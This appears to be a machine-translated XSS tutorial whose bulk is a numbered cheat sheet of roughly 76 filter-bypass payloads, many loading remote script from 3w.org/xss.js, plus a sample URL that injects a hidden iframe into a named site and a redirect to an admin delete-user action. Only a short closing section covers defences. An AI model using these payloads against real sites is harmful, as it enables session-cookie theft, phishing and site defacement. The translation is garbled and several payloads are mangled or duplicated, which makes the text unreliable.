Introduction to XSS Cross-site vulnerability

An XSS attack is a malicious attacker who inserts malicious HTML code into a Web page, and when a user browses to the page, the HTML code embedded inside the Web is executed to achieve the special purpose of the malicious user.

In general, the use of Cross-site scripting attacks allows attackers to steal session cookies, thereby stealing web site users ' privacy, including passwords.

The techniques used by XSS attacks are mainly HTML and JavaScript, as well as VBScript and ActionScript. XSS attacks on the Web server although there is no direct harm, but it spread through the web site, so that users of the site to be attacked, resulting in Web site user account is stolen, so that the site also has a more serious harm.

XSS attacks fall into two categories

One kind is from the internal attack, mainly refers to utilizes the procedure own flaw, constructs the Cross station statement, for instance: Dvbbs showerror.asp Existence's Cross station flaw.

The other is from an external attack, which mainly refers to a Web page that constructs an XSS cross-site vulnerability or looks for a cross-site vulnerability other than a target. If we are going to infiltrate a site, we construct a Web page that has a cross-site vulnerability and then construct a cross-site statement that deceives the administrator of the target server by combining other technologies, such as social engineering, to open

Types of XSS

One is the storage type: that is, the code is written to the database

One is a non-warehousing type: The code is not written to the database

XSS Workflow

1 malicious users, in some public areas (for example, the input form that recommends submitting a form or message board), enter some text that is seen by other users, but not just the text they want to enter, but also some scripts that can be executed on the client. Such as:

<script>

This.document = "*********";

</script>

2 Malicious submission of this form

3 other users see this includes malicious script page and execute, get the user's cookies and other sensitive information.

Common attack code for XSS

(1) Common XSS JavaScript injection

<script src=http://3w.org/xss/xss.js></script>

(2) IMG tag XSS using javascript command

<script src=http://3w.org/xss/xss.js></script>

(3) IMG Tags no semicolon no quotes

(4) IMG tag is not case sensitive

(5) HTML encoding (must have a semicolon)

(6) Fixed bug img tag

<script>alert (" XSS ") </SCRIPT>" >

(7) Formcharcode label (calculator)

(8) UTF-8 Unicode Encoding (Calculator)

(9) 7-bit UTF-8 Unicode encoding is not a semicolon (calculator)

(10) hexadecimal encoding is no semicolon (calculator)

(11) Embedded tab, separating JavaScript

This column more highlights: http://www.bianceng.cnhttp://www.bianceng.cn/Network/Security/

(12) Embedded coded tags, separate javascript

(13) Embedded line breaks

(14) Embedded carriage return

(15) Embedded multiline injection of JavaScript, which is an extreme example of XSS

(16) To resolve the restricted character (request same page)

<script>z= ' document. ' </script>

< script>z=z+ ' Write (' </script>

< script>z=z+ ' <script ' </script>

< script>z=z+ ' Src=ht ' </script>

< script>z=z+ ' TP://WW ' </script>

< script>z=z+ ' W.shell ' </script>

< script>z=z+ '. Net/1. ' </script>

< script>z=z+ ' JS></SC ' </script>

< script>z=z+ ' ript> ') ' </script>

< Script>eval_r (z) </script>

(17) NULL character

Perl-e ' print ' "; ' > Out

(18) empty character 2, empty characters in the domestic basic no effect. Because there's no place to use it.

Perl-e ' print ' <scr\0ipt>alert (\ "xss\") </SCR\0IPT> "; ' > Out

(19) Spaces and meta img Tags

(20) Non-alpha-non-digit XSS

< SCRIPT/XSS src= "Http://3w.org/XSS/xss.js" ></SCRIPT>

(21) Non-alpha-non-digit XSS to 2

< body onload!#$%& () *~+-_.,:;? @[/|\]^ ' =alert ("XSS") >

(22) Non-alpha-non-digit XSS to 3

< script/src= "Http://3w.org/XSS/xss.js" ></SCRIPT>

(23) Double open bracket

<<script>alert ("XSS");//<</script>

(24) No End script tags (firefox, only browser)

<script src=http://3w.org/xss/xss.js?<b>

(25) No end script Mark 2

< SCRIPT src=//3w.org/xss/xss.js>

(26) Semi-open Html/javascript XSS

< IMG src= "alert (' XSS ')"

(27) Double open angle bracket

<iframe Src=http://3w.org/xss.html <

(28) No single quote double quote semicolon

<script>a=/xss/

Alert (A.source) </SCRIPT>

(29) Code Filter for JavaScript

\ "; Alert (' XSS ');

(30) End title Tag

</title><script>alert ("XSS");</script>

(31) Input Image

< INPUT src= "alert (' XSS ');" >

(32) Body Image

< body background= "alert (' XSS ')" >

(33) Body Label

<body (' XSS ') >

(34) IMG DYNSRC

< IMG dynsrc= "alert (' XSS ')" >

(35) IMG LOWSRC

< IMG lowsrc= "alert (' XSS ')" >

(36) BGSOUND

< BGSOUND src= "alert (' XSS ');" >

(37) STYLE Sheet

< LINK rel= "stylesheet" href= "alert (' XSS ');" >

(38) Remote style sheet

<link rel= "stylesheet" href= "Http://3w.org/xss.css" >

(39) List-style-image (list type)

<style>li {list-style-image:url ("alert (' XSS ')");} </STYLE><UL><LI>XSS

(40) IMG VBscript

< IMG src= ' Vbscript:msgbox ("XSS") ' ></STYLE><UL><LI>XSS

(41) Meta link URL

< META http-equiv= "refresh" content= "0; url=http://; Url=alert (' XSS '); " >

(42) Iframe

< IFRAME src= "alert (' XSS ');" ></iframe>

(43) Frame

< Frameset><frame src= "alert (' XSS ');" ></frameset>

(44) Table

< TABLE background= "alert (' XSS ')" >

(45) Td

< TABLE><TD background= "alert (' XSS ')" >

(46) DIV Background-image

< DIV style= "Background-image:url" (Alert (' XSS ')) >

(47) DIV background-image plus extra characters (1-32&34&39&160&8192-8&13&12288&65279)

< DIV style= "Background-image:url" (Alert (' XSS ')) >

(48) DIV expression

< DIV style= "Width:expression_r" (Alert (' XSS ')); >

(49) style attribute split expression

(50) Anonymous style (composition: opening horn and beginning of a letter)

<XSS style= "Xss:expression_r" (Alert (' XSS ')) >

(51) STYLE Background-image

< Style>. Xss{background-image:url ("alert (' XSS ')");} </style><a class=xss></a>

(52) IMG style mode

Exppression (Alert ("XSS")) ' >

(53) STYLE background

< Style><style type= "Text/css" >body{url ("alert (' XSS ')")}</style>

(54) BASE

< BASE href= "alert" (' XSS '); ">

(55) Embed tags, you can embed the Flash, which includes XSS

< EMBED src= "http://3w.org/XSS/xss.swf" ></EMBED>

(56) Use ACTIONSCRPT in Flash to infiltrate your XSS code

A= "Get";

b= "URL (\" ";

c= "javascript:";

d= "alert (' XSS '); \");

Eval_r (A+B+C+D);

(57) XML namespace. HTC files must be on a server with your XSS carrier

< import namespace= "XSS" implementation= "HTTP://3W.ORG/XSS/XSS.HTC" >

<xss:xss>XSS</xss:xss>

(58) If you filter your JS you can add JS code in the picture to use

<script src= "" ></SCRIPT>

(59) IMG Embedded command, execute arbitrary command

(60) IMG Embedded command (a.jpg on the same server)

Redirect 302/a.jpghttp://www.xxx.com/admin.asp&deleteuser

(61) Around the symbol filter

<script a= ">" src= "http://3w.org/xss.js" ></SCRIPT>

(62)

< SCRIPT = ">" src= "http://3w.org/xss.js" ></SCRIPT>

(63)

< SCRIPT a= ">" "src=" Http://3w.org/xss.js "></SCRIPT>

(64)

< SCRIPT "A= ' >" "src=" Http://3w.org/xss.js "></SCRIPT>

(65)

< SCRIPT a= ' > ' src= ' http://3w.org/xss.js ' ></SCRIPT>

(66)

< SCRIPT a= "> ' >" src= "http://3w.org/xss.js" ></SCRIPT>

(67)

< Script>document.write ("<scri"); </script>pt src= "Http://3w.org/xss.js" ></SCRIPT>

(68) URL Bypass

<a href= "HTTP://127.0.0.1/" >XSS</A>

(69) URL encoding

<a href= "http://3w.org" >XSS</A>

(70) IP decimal

<a href= "http://3232235521″>xss</a>

(71) IP hex

<a href= "http://0xc0.0xa8.0x00.0x01″>xss</a>

(72) IP octal

<a href= "http://0300.0250.0000.0001″>xss</a>

(73) Mixed coding

<a href= "H

tt P://6 6.000146.0x7.147/"" >XSS</A>

(74) Save [http:]

< A href= "//www.google.com/" >XSS</A>

(75) Save [www]

< A href= "http://google.com/" >XSS</A>

(76) Absolute Point Absolute DNS

< A href= "http://www.google.com./" >XSS</A>

(+) JavaScript links

<a href= "javascript:document.location= ' http://www.google.com/'" >XSS</A>

XSS Vulnerability Mining and utilization

1. Excavation

URL with Chinese, or URL-coded

Http://sqxhsp.com/news.asp?cat_id=11&types= Enterprise News

2. Use

<script>alert (' baidu.com ') </script>

<iframe Src=http://baidu .com></iframe>

<iframe src=http://baidu. com width=0 height=0></iframe>

<meta http-equiv= "Refresh" content= "2;url=http://baidu. com" >

Cases:

http://sqxhsp.com/news.asp?cat_id=11&types= Enterprise News <iframe%20src=http://%62%61%69%64%75%2e%63%6f%6d%20width =0%20height=0></iframe>

If an IFRAME contains an XSS script, it will pose a horse attack or attack site when it is accessed.

Cross-site Scripting vulnerability compromise

Phishing scams: The most typical is to redirect the target site to a phishing site using a reflective cross-site scripting vulnerability on the target site, or to inject phishing JavaScript to monitor form input from the target site, or even to launch a more advanced phishing attack based on DHTML.

Website hangs the horse: when the Cross station uses the IFRAME to embed the hidden malicious website or will be directed by the attacker to the malicious website, or the pop-up malicious website window and so on can carry on the horse attack.

Identity theft: A cookie is a user's authentication flag for a particular Web site, and XSS can steal a user's cookie and use that cookie to steal the user's permission to operate the site. If a website administrator user cookie is stolen, it will cause great harm to the website.

Theft of Web site user information: When the user can be stolen cookies to obtain user identity, the attacker can gain access to the user's Web site operations, so as to view the user's privacy information.

Spam send: For example, in the SNS community, the use of XSS vulnerabilities to borrow the identity of the attacker to send a large amount of spam information to a specific target group.

Hijacking user Web behavior: Some advanced XSS attacks can even hijack a user's web behavior, monitor the user's browsing history, send and receive data, and so on.

XSS worms: XSS worms can be used to advertise, brush traffic, hang horses, prank, disrupt online data, implement DDoS attacks, and so on.

Cross-site Scripting Vulnerability Solution

Check that the variable is initialized correctly and that the variable type is clear

Not only to validate the type of data, but also to verify its format, length, scope, and content.

Instead of just making HTML tag escapes on the client and filtering for dangerous characters such as single quotes and double quotes, the key filtering steps should also be done at the server.

To the output to the page of the data also need to do security checks, the value of the database may be in a large site has a lot of output, even in the input to do the coding and other operations, in the output points in various places to carry out security checks.

Test all known threats before publishing the application.